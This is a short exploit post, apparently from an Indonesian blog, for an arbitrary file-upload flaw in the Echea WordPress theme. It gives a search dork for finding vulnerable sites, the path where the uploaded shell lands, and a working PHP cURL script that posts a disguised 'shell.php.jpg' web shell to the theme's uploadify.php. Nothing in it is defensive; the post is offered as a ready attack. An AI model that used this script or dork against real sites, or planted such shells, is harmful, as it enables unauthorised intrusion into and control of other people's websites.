Exploit Wordpress : Echea Theme - Upload File Kerentanan

chmood

Dork: inurl:/wp-content/themes/echea/

Shell Uploaded to: 
http://www.site.com/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg 

Exploit:

<?php
$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
This exploit is the same as my previous post, so check it! :P



Komentar